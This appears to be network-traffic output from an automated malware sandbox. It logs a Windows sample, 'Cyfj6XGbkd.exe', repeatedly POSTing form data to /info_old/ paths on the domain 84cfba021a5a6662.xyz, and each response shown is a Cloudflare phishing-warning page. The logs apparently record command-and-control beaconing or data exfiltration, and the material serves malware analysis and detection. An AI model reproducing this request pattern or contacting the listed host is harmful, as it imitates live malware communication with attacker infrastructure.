                                                                                                                                                    CF-RAY: 61945fbf8d11c771-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
                                                                                                                                                    Jan 29, 2021 17:36:49.255383968 CET181OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:49.311367989 CET183INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:49 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=dfd1543d618807c76cb51baef504b58491611938209; expires=Sun, 28-Feb-21 16:36:49 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a360d0000c7713abc2000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kDBDa3O4gcjQHx7SddhRGwqhUKmFKuFOCZV61Ca41y3J0daL4CBfi4qULaTcPjYCuwV2Y0FH1mkanoF7BwVd4f1yEU6ywTAC872iBXOU5fJcKuDluw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fd01c9bc771-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.649730104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:36:46.738434076 CET175OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:46.807162046 CET176INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d44c674e9b268f9729bc63b270c11e6fb1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2c360000fa887a3a9000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bgeVqZANOyLARbubF49VtUP%2BZDvlFHU2EXWwvnYQLx41IuECCf6Iv3nEhozobRthbuUQtu8HTzOt4czKuTC7xmyu3fCffsHgriO5TJhL669K9MECjQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fc05ce6fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
                                                                                                                                                    Jan 29, 2021 17:36:55.304384947 CET187OUTPOST /info_old/e HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 677
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:55.358536005 CET190INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:55 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a4daf0000fa8808379000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DszwcFU1azWQLn01RElxOwnV2O2Ueli9QIC2IbMyKMQVDlZD5IjdcVbfh5UvCbSQdvehZMIYHKVW8KDBGHU1n7v6nJ75mb0b7%2Bh73mH%2B0VSgQPaReA%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ff5ecddfa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                                                                                                    Jan 29, 2021 17:36:55.381866932 CET194OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:55.432903051 CET196INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:55 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a4dfa0000fa8830063000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=D9fwJOS8pZebGFQq7B6FJLaQ%2FmcNDipyadybgDD7L1SKN97VSbKQsHKdxwBNnl3D2%2FOx1sH34jEiZYb1VtlFnHKk09yuid%2F54wWWzO9I6f6a3y5cJQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ff65de5fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
                                                                                                                                                    Jan 29, 2021 17:36:56.186005116 CET223OUTPOST /info_old/g HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 1393
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:56.243818045 CET225INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51220000fa880fab6000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4cBjVt6maK1fuMMQwP2NLxcTyTXIs04jwjJLktsaBAHCzMfSBk5sXhUCUfo1tWttLn99vsmrv4c3y411195%2BQM9Kt0D3ZN8BEjIGDpMtuLMG3f%2BpWg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffb6a69fa88-AMS
